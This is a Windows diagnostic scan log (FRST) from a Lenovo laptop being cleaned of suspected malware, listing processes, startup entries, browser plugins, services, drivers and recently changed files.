(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Lenovo Group Limited) C:\Program Files (x86)\Lenovo\Password Manager\pwm_ie_helper_desktop.exe
(Lenovo Group Limited) C:\Program Files (x86)\Lenovo\Password Manager\password_manager.exe
(Lenovo) C:\Program Files (x86)\Lenovo\Access Connections\SvcGuiHlpr.exe
(Valve Corporation) C:\Program Files (x86)\Steam\Steam.exe
(Amazon.com) C:\Program Files (x86)\Amazon\Amazon Unbox Video\ADVWindowsClientSystemTray.exe
(Broadcom Corporation.) C:\Program Files\ThinkPad\Bluetooth Software\BTTray.exe
(Ricoh co.,Ltd.) C:\Program Files (x86)\Integrated Camera Driver\X64\RCIMGDIR.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
(Dolby Laboratories Inc.) C:\Program Files (x86)\Dolby Home Theater v4\pcee4.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Intuit Inc.) C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBUpdate\qbupdate.exe
(Intuit Inc.) C:\Program Files (x86)\Intuit\QuickBooks 2016\QBW32.EXE
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Lenovo Group Limited) C:\Program Files (x86)\ThinkPad\Utilities\SCHTASK.EXE
(Brother Industries, Ltd.) C:\Program Files (x86)\ControlCenter4\BrCtrlCntr.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Broadcom Corporation.) C:\Program Files\ThinkPad\Bluetooth Software\BTStackServer.exe
(Lenovo) C:\Program Files\Lenovo\Lenovo Solution Center\LSCNotify.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Brother\Brother Help\BrotherHelp.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\ControlCenter4\BrCcUxSys.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
(Valve Corporation) C:\Program Files (x86)\Common Files\Steam\SteamService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Lenovo) C:\Program Files (x86)\ThinkPad\Utilities\PWMDBSVC.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\IMSS\PrivacyIconClient.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MpCmdRun.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe


==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13776088 2014-12-11] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_Dolby] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1391472 2014-12-11] (Realtek Semiconductor)
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [1337000 2015-04-30] (Microsoft Corporation)
HKLM\...\Run: [LENOVO.TPKNRRES] => C:\Program Files\Lenovo\Communications Utility\TPKNRRES.exe [295712 2014-08-07] (Lenovo Group Limited)
HKLM\...\Run: [AcWin7Hlpr] => C:\Program Files (x86)\Lenovo\Access Connections\AcTBenabler.exe [63728 2015-06-08] (Lenovo)
HKLM\...\Run: [TpShocks] => C:\Windows\system32\TpShocks.exe [384344 2014-02-17] (Lenovo.)
HKLM\...\Run: [PasswordManager] => C:\Program Files\Lenovo\Password Manager\password_manager.exe [1665824 2014-06-23] (Lenovo Group Limited)
HKLM\...\Run: [RtHDVBg_LENOVO_MICPKEY] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1391472 2014-12-11] (Realtek Semiconductor)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [176952 2016-05-11] (Apple Inc.)
HKLM-x32\...\Run: [RotateImage] => C:\Program Files (x86)\Integrated Camera Driver\X64\RCIMGDIR.exe [66560 2013-06-17] (Ricoh co.,Ltd.)
HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [292088 2013-07-18] (Intel Corporation)
HKLM-x32\...\Run: [Dolby Home Theater v4] => C:\Program Files (x86)\Dolby Home Theater v4\pcee4.exe [508656 2012-08-31] (Dolby Laboratories Inc.)
HKLM-x32\...\Run: [PWMTRV] => rundll32 "C:\Program Files (x86)\ThinkPad\Utilities\PWMTR64V.DLL",PwrMgrBkGndMonitor
HKLM-x32\...\Run: [IMSS] => C:\Program Files (x86)\Intel\Intel® Management Engine Components\IMSS\PIconStartup.exe [134616 2013-12-03] (Intel Corporation)
HKLM-x32\...\Run: [MobileBroadband] => C:\Program Files (x86)\Vodafone\Vodafone Mobile Broadband\Bin\MobileBroadband.exe [408576 2011-04-19] (Vodafone)
HKLM-x32\...\Run: [ControlCenter4] => C:\Program Files (x86)\ControlCenter4\BrCcBoot.exe [139264 2013-04-08] (Brother Industries, Ltd.)
HKLM-x32\...\Run: [BrStsMon00] => C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe [4522496 2013-03-22] (Brother Industries, Ltd.)
HKLM-x32\...\Run: [BrHelp] => C:\Program Files (x86)\Brother\Brother Help\BrotherHelp.exe [1944576 2013-03-07] (Brother Industries, Ltd.)
HKLM-x32\...\Run: [Intuit SyncManager] => C:\Program Files (x86)\Common Files\Intuit\Sync\IntuitSyncManager.exe [3792648 2016-02-11] (Intuit Inc. All rights reserved.)
HKLM-x32\...\Run: [FwWordConverter] => C:\Program Files (x86)\RL-Software\FwWordConverter\complete.exe [210944 2016-06-20] (R&L Software)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [595992 2016-05-20] (Oracle Corporation)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
Winlogon\Notify\psfus: C:\Program Files\ThinkVantage Fingerprint Software\psqlpwd.dll (Authentec Inc.)
HKU\S-1-5-21-2572138134-34439291-2312372487-1000\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [2917456 2016-06-14] (Valve Corporation)
Lsa: [Notification Packages] scecli C:\Program Files\ThinkPad\Bluetooth Software\BtwProximityCP.dll C:\Program Files\ThinkVantage Fingerprint Software\psqlpwd.dll
ShellIconOverlayIdentifiers: [EldosIconOverlay] -> {5BB532A2-BF14-4CCC-86B7-71B81EF6F8BC} => C:\Windows\system32\CbFsMntNtf3.dll [2012-04-09] (EldoS Corporation)
ShellIconOverlayIdentifiers-x32: [EldosIconOverlay] -> {5BB532A2-BF14-4CCC-86B7-71B81EF6F8BC} => C:\Windows\SysWOW64\CbFsMntNtf3.dll [2012-04-09] (EldoS Corporation)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Amazon Unbox.lnk [2014-05-30]
ShortcutTarget: Amazon Unbox.lnk -> C:\Program Files (x86)\Amazon\Amazon Unbox Video\ADVWindowsClientSystemTray.exe (Amazon.com)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Bluetooth.lnk [2014-05-30]
ShortcutTarget: Bluetooth.lnk -> C:\Program Files\ThinkPad\Bluetooth Software\BTTray.exe (Broadcom Corporation.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Intuit Data Protect.lnk [2016-05-28]
ShortcutTarget: Intuit Data Protect.lnk -> C:\Program Files (x86)\Common Files\Intuit\DataProtect\IntuitDataProtect.exe (Intuit Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\QuickBooks Update Agent.lnk [2016-05-28]
ShortcutTarget: QuickBooks Update Agent.lnk -> C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBUpdate\qbupdate.exe (Intuit Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\QuickBooks_Standard_21.lnk [2016-05-28]
ShortcutTarget: QuickBooks_Standard_21.lnk -> C:\Program Files (x86)\Intuit\QuickBooks 2016\QBW32.EXE (Intuit Inc.)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{00F12050-C1AB-420D-93CB-FDF14345310D}: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{043BE712-F8BC-4377-96FB-45DB49ECFB1D}: [NameServer] 197.250.65.178 41.223.5.33
Tcpip\..\Interfaces\{043BE712-F8BC-4377-96FB-45DB49ECFB1D}: [DhcpNameServer] 197.250.65.178 41.223.5.33
Tcpip\..\Interfaces\{29476DF9-6B52-48BF-9ABE-9D23CBBCCBDA}: [NameServer] 197.250.65.178 41.223.5.33
Tcpip\..\Interfaces\{36EED24D-C991-404A-9A7B-1353998A1249}: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{5F842A87-F1DD-44FE-99AE-8492F10299AD}: [NameServer] 197.250.65.178 41.223.5.33

Internet Explorer:
==================
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_91\bin\ssv.dll [2016-06-26] (Oracle Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_91\bin\jp2ssv.dll [2016-06-26] (Oracle Corporation)
Handler-x32: intu-help-qb9 - {C1252096-0E63-4C06-A38B-03DF9A16AA12} - C:\Program Files (x86)\Intuit\QuickBooks 2016\HelpAsyncPluggableProtocol.dll [2016-02-11] (Intuit, Inc.)
Handler-x32: qbwc - {FC598A64-626C-4447-85B8-53150405FD57} - C:\Windows\system32\mscoree.dll [2010-11-20] (Microsoft Corporation)

FireFox:
========
FF ProfilePath: C:\Users\User1\AppData\Roaming\Mozilla\Firefox\Profiles\7nkpvw3l.default-1437326176257
FF DefaultSearchEngine.US: Google
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_22_0_0_192.dll [2016-06-17] ()
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.40728.0\npctrl.dll [2015-07-28] ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_22_0_0_192.dll [2016-06-17] ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2015-12-18] ()
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/pdf -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2015-02-11] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.fdf -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2015-02-11] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.xdp -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2015-02-11] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.xfdf -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2015-02-11] (Foxit Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-12-03] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-12-03] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.91.2 -> C:\Program Files (x86)\Java\jre1.8.0_91\bin\dtplugin\npDeployJava1.dll [2016-06-26] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.91.2 -> C:\Program Files (x86)\Java\jre1.8.0_91\bin\plugin2\npjp2.dll [2016-06-26] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.40728.0\npctrl.dll [2015-07-28] ( Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.30.3\npGoogleUpdate3.dll [2016-05-10] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.30.3\npGoogleUpdate3.dll [2016-05-10] (Google Inc.)
FF Extension: Adblock Plus - C:\Users\User1\AppData\Roaming\Mozilla\Firefox\Profiles\7nkpvw3l.default-1437326176257\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2016-04-29]
FF HKU\S-1-5-21-2572138134-34439291-2312372487-1000\...\Firefox\Extensions: [{F74D5734-46F5-4B16-96F0-1E7FBF41B750}] - C:\Program Files (x86)\Lenovo\Password Manager\PWM Firefox Extension\2.0b12
FF Extension: ThinkVantage Password Manager - C:\Program Files (x86)\Lenovo\Password Manager\PWM Firefox Extension\2.0b12 [2014-07-21] [not signed]

Chrome:
=======
CHR Profile: C:\Users\User1\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\User1\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-06-05]
CHR Extension: (Google Drive) - C:\Users\User1\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-11-19]
CHR Extension: (ColorZilla) - C:\Users\User1\AppData\Local\Google\Chrome\User Data\Default\Extensions\bhlhnicpbhignbdhedgjhgdocnmhomnp [2015-08-17]
CHR Extension: (YouTube) - C:\Users\User1\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-10-19]
CHR Extension: (Google Search) - C:\Users\User1\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-19]
CHR Extension: (Google Docs Offline) - C:\Users\User1\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-04-10]
CHR Extension: (Boomerang for Gmail) - C:\Users\User1\AppData\Local\Google\Chrome\User Data\Default\Extensions\mdanidgdpmkimeiiojknlnekblgmpdll [2016-04-08]
CHR Extension: (Chrome Web Store Payments) - C:\Users\User1\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-05-22]
CHR Extension: (Gmail) - C:\Users\User1\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-06-05]
CHR HKLM-x32\...\Chrome\Extension: [lpdfbkehegfmedglgemnhbnpmfmioggj] - hxxps://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 ADVService; C:\Program Files (x86)\Amazon\Amazon Unbox Video\ADVWindowsClientService.exe [23040 2015-02-22] (Amazon.com) [File not signed]
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [83768 2016-03-02] (Apple Inc.)
S3 BrYNSvc; C:\Program Files (x86)\Browny02\BrYNSvc.exe [282112 2012-10-26] (Brother Industries, Ltd.) [File not signed]
S3 DozeSvc; C:\Program Files (x86)\ThinkPad\Utilities\DZSVC64.EXE [326160 2016-04-14] (Lenovo.)
R2 FoxitCloudUpdateService; C:\Program Files (x86)\Foxit Software\Foxit Reader\Foxit Cloud\FCUpdateService.exe [244392 2015-03-13] (Foxit Software Inc.)
R2 Intel® Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel® Corporation) [File not signed]
S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel® Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [169432 2013-12-03] (Intel Corporation)
R2 LENOVO.TVTVCAM; C:\Program Files\Lenovo\Communications Utility\vcamsvc.exe [197408 2014-08-07] (Lenovo Group Limited)
R2 Lenovo.VIRTSCRLSVC; C:\Program Files\LENOVO\VIRTSCRL\lvvsst.exe [115184 2014-07-08] (Lenovo Group Limited)
S3 LSC.Services.SystemService; C:\Program Files\Lenovo\Lenovo Solution Center\App\LSC.Services.SystemService.exe [273232 2016-04-20] (Lenovo)
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [23816 2015-04-30] (Microsoft Corporation)
S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [265936 2014-08-18] ()
R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [366544 2015-04-30] (Microsoft Corporation)
R2 QBCFMonitorService; C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe [45056 2016-02-11] (Intuit) [File not signed]
S3 QBFCService; C:\Program Files (x86)\Common Files\Intuit\QuickBooks\FCS\Intuit.QuickBooks.FCS.exe [65536 2016-02-11] (Intuit Inc.) [File not signed]
R2 QBVSS; C:\Program Files (x86)\Common Files\Intuit\DataProtect\QBIDPService.exe [1248256 2016-02-11] (Intuit Inc.) [File not signed]
S3 ShareItSvc; C:\Program Files (x86)\Lenovo\SHAREit\Shareit.Service.exe [31176 2016-01-20] (SHAREit Technologies Co.Ltd)
S3 SUService; C:\Program Files (x86)\Lenovo\System Update\SUService.exe [21536 2016-05-25] ()
R2 VmbService; C:\Program Files (x86)\Vodafone\Vodafone Mobile Broadband\Bin\VmbService.exe [9216 2011-04-19] (Vodafone) [File not signed]
S4 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [3817168 2014-08-18] (Intel® Corporation)

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 bcbtums; C:\Windows\System32\drivers\bcbtums.sys [170200 2013-03-27] (Broadcom Corporation.)
R3 cbfs3; C:\Windows\System32\DRIVERS\cbfs3.sys [352144 2012-04-09] (EldoS Corporation)
S3 ebdrv; C:\Windows\system32\drivers\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)
S3 huawei_wwanecm; C:\Windows\System32\DRIVERS\ew_juwwanecm.sys [196608 2011-04-18] (Huawei Technologies Co., Ltd.)
R3 MEIx64; C:\Windows\System32\DRIVERS\TeeDriverx64.sys [100824 2013-12-03] (Intel Corporation)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [280376 2015-03-04] (Microsoft Corporation)
R1 MpKsl6d86d6a1; c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{877844DB-0112-4DBA-8666-0C8D42920DD5}\MpKsl6d86d6a1.sys [44928 2016-07-04] (Microsoft Corporation)
R2 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [124568 2015-03-04] (Microsoft Corporation)
R3 RCUVCAVS; C:\Windows\System32\DRIVERS\RCUVCAVS.sys [177920 2013-07-05] (Ricoh co.,Ltd.)
R3 SmbDrvI; C:\Windows\System32\DRIVERS\Smb_driver_Intel.sys [45296 2014-07-28] (Synaptics Incorporated)
R2 smihlp; C:\Program Files\ThinkVantage Fingerprint Software\smihlp.sys [13128 2011-05-30] (Authentec Inc.)
R3 usb3Hub; C:\Windows\System32\DRIVERS\usb3Hub.sys [206744 2013-06-20] (Windows ® Win 7 DDK provider)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-07-04 16:48 - 2016-07-04 16:48 - 00001059 _____ C:\Users\User1\Desktop\MBAM Scan 1.txt
2016-07-04 15:25 - 2016-07-04 23:03 - 00000000 ____D C:\Users\User1\Desktop\FRST64
2016-07-04 12:45 - 2016-07-04 12:45 - 00000562 _____ C:\Users\User1\Desktop\JRT2.txt
2016-07-04 12:31 - 2016-07-04 12:41 - 00000562 _____ C:\Users\User1\Desktop\JRT.txt
2016-07-04 12:26 - 2016-07-04 12:26 - 01610816 _____ (Malwarebytes) C:\Users\User1\Desktop\JRT.exe
2016-07-04 12:08 - 2016-07-04 12:17 - 00000000 ____D C:\AdwCleaner
2016-07-04 12:06 - 2016-07-04 12:06 - 00000000 ____D C:\Users\User1\Desktop\Virus Fix Files
2016-07-04 12:00 - 2016-07-04 12:00 - 03712064 _____ C:\Users\User1\Desktop\adwcleaner_5.201.exe
2016-07-03 12:51 - 2016-07-04 23:03 - 00000000 ____D C:\FRST
2016-07-02 20:06 - 2016-07-02 20:06 - 02030536 _____ (Bleeping Computer, LLC) C:\Users\User1\Desktop\rkill.exe
2016-07-02 19:26 - 2016-07-02 19:26 - 00000261 _____ C:\Users\User1\Desktop\2016-07 Attempted Virus.txt
2016-07-02 19:25 - 2016-07-02 19:25 - 00000886 _____ C:\Users\User1\Desktop\2016-07 TO DO GENERAL.txt
2016-07-02 19:19 - 2016-07-02 19:19 - 00000220 _____ C:\Users\User1\Desktop\2016-07 To Do MM.txt
2016-07-02 19:15 - 2016-07-02 19:17 - 00000265 _____ C:\Users\User1\Desktop\2016-07 TO DO CAREER.txt
2016-06-28 12:10 - 2016-07-04 12:18 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-06-21 09:08 - 2016-06-21 09:08 - 00000652 _____ C:\Users\User1\Desktop\2016-06-21 To Do.txt
2016-06-21 09:07 - 2016-06-21 09:07 - 00003313 _____ C:\Users\User1\Desktop\2016-06-21 New Panora - put in Scriv.txt
2016-06-20 15:16 - 2016-06-20 15:16 - 00000000 ____D C:\Users\User1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\FwWordConverter
2016-06-20 15:16 - 2016-06-20 15:16 - 00000000 ____D C:\Program Files (x86)\RL-Software
2016-06-20 15:10 - 2016-07-04 12:02 - 00000000 ____D C:\Users\User1\Desktop\Pandora
2016-06-20 15:10 - 2016-06-20 15:11 - 00000000 ____D C:\Users\User1\Desktop\MM
2016-06-20 10:09 - 2016-06-20 10:09 - 00000000 ____D C:\Users\User1\.QtWebEngineProcess
2016-06-20 10:09 - 2016-06-20 10:09 - 00000000 ____D C:\Users\User1\.LSC

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-07-04 22:40 - 2014-05-24 18:43 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2016-07-04 22:16 - 2014-05-30 19:10 - 00000898 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2016-07-04 18:16 - 2014-05-30 19:10 - 00000894 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2016-07-04 16:30 - 2014-05-31 00:42 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2016-07-04 16:29 - 2015-06-04 11:38 - 00001113 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2016-07-04 16:29 - 2014-05-31 00:42 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2016-07-04 16:29 - 2014-05-31 00:42 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2016-07-04 15:38 - 2009-07-13 23:45 - 00031296 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2016-07-04 15:38 - 2009-07-13 23:45 - 00031296 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2016-07-04 15:36 - 2009-07-14 00:13 - 00884036 _____ C:\Windows\system32\PerfStringBackup.INI
2016-07-04 15:36 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\inf
2016-07-04 15:30 - 2016-02-26 17:09 - 00000000 ____D C:\Program Files (x86)\Steam
2016-07-04 15:29 - 2009-07-14 00:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-07-04 15:27 - 2015-08-24 16:02 - 00000000 ____D C:\Users\User1\AppData\LocalLow\Temp
2016-07-04 12:18 - 2014-07-14 22:50 - 00000000 ____D C:\Users\User1\AppData\Local\DM
2016-07-04 12:18 - 2014-05-22 18:19 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-07-04 12:03 - 2012-11-20 04:39 - 00000000 ____D C:\Users\User1\Documents\To Do
2016-07-03 23:06 - 2012-11-19 04:40 - 00000000 ____D C:\Users\User1\Documents\Health
2016-07-02 23:29 - 2016-01-06 17:01 - 00013122 _____ C:\Users\User1\Desktop\New Year's Resolutions.xlsx
2016-07-02 23:29 - 2014-05-30 23:59 - 00000000 ____D C:\Users\User1\AppData\Roaming\Skype
2016-07-02 19:19 - 2013-04-23 16:48 - 00000000 ____D C:\Users\User1\Documents\Car
2016-07-02 19:11 - 2016-05-28 15:21 - 00006094 _____ C:\Users\User1\Desktop\2016-05 revive.txt
2016-07-02 18:58 - 2014-05-24 17:05 - 00000000 ____D C:\Users\User1\Documents\Career
2016-07-02 17:24 - 2012-09-24 21:49 - 00000000 ____D C:\Users\User1\Documents\Financial
2016-07-02 16:33 - 2013-04-24 18:02 - 00000000 ____D C:\Users\User1\Documents\Writing - Publishing
2016-06-30 15:45 - 2013-03-08 13:21 - 00024460 _____ C:\Users\User1\Documents\Reading List.xlsx
2016-06-28 11:34 - 2012-07-27 16:23 - 00008727 _____ C:\Users\User1\Documents\Address Book (merge).xlsx
2016-06-26 12:30 - 2014-05-24 18:54 - 00000000 ____D C:\ProgramData\Oracle
2016-06-26 11:54 - 2014-12-22 18:33 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2016-06-26 11:54 - 2014-12-22 18:33 - 00000000 ____D C:\Program Files (x86)\Java
2016-06-26 11:53 - 2015-09-07 16:40 - 00000000 ____D C:\Users\User1\.oracle_jre_usage
2016-06-26 11:53 - 2014-12-22 18:33 - 00097344 _____ (Oracle Corporation) C:\Windows\SysWOW64\WindowsAccessBridge-32.dll
2016-06-26 11:52 - 2016-04-15 19:10 - 00000000 ____D C:\Users\User1\Desktop\Installers
2016-06-20 10:09 - 2014-05-30 11:07 - 00000000 ____D C:\Users\User1\AppData\Roaming\Lenovo
2016-06-20 10:09 - 2014-05-16 11:49 - 00000000 ____D C:\Users\User1
2016-06-20 08:22 - 2014-05-16 12:09 - 00000000 ___HD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lenovo ThinkVantage Tools
2016-06-20 08:22 - 2014-05-16 12:09 - 00000000 ____D C:\Windows\System32\Tasks\TVT
2016-06-20 08:22 - 2014-05-16 12:09 - 00000000 ____D C:\Windows\System32\Tasks\Lenovo
2016-06-20 08:22 - 2014-05-16 12:09 - 00000000 ____D C:\Program Files (x86)\Lenovo
2016-06-20 08:21 - 2014-05-16 12:09 - 00000000 ____D C:\ProgramData\lenovo
2016-06-17 20:17 - 2014-05-30 19:11 - 00002206 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-06-17 20:17 - 2014-05-30 19:11 - 00002194 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-06-17 03:40 - 2014-05-24 18:43 - 00796352 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2016-06-17 03:40 - 2014-05-24 18:43 - 00142528 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2016-06-17 03:40 - 2014-05-24 18:43 - 00003768 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2016-06-04 11:46 - 2012-10-31 23:36 - 00000000 ____D C:\Users\User1\Documents\Recipes

==================== Files in the root of some directories =======

2014-05-29 00:54 - 2014-05-29 00:54 - 0000000 _____ () C:\Program Files (x86)\Mozilla Firefoxwtu-secure-search.xml
2014-12-27 21:52 - 2014-12-27 21:52 - 0033193 _____ () C:\Users\User1\AppData\Roaming\UserTile.png
2015-04-15 10:59 - 2015-04-15 10:59 - 0000852 _____ () C:\Users\User1\AppData\Local\recently-used.xbel
2014-05-16 11:17 - 2015-09-08 01:34 - 0007598 _____ () C:\Users\User1\AppData\Local\resmon.resmoncfg
2014-05-30 19:14 - 2014-05-30 19:15 - 0037497 _____ () C:\Users\User1\AppData\Local\WiDiSetupLog.20140530.201458.wdl
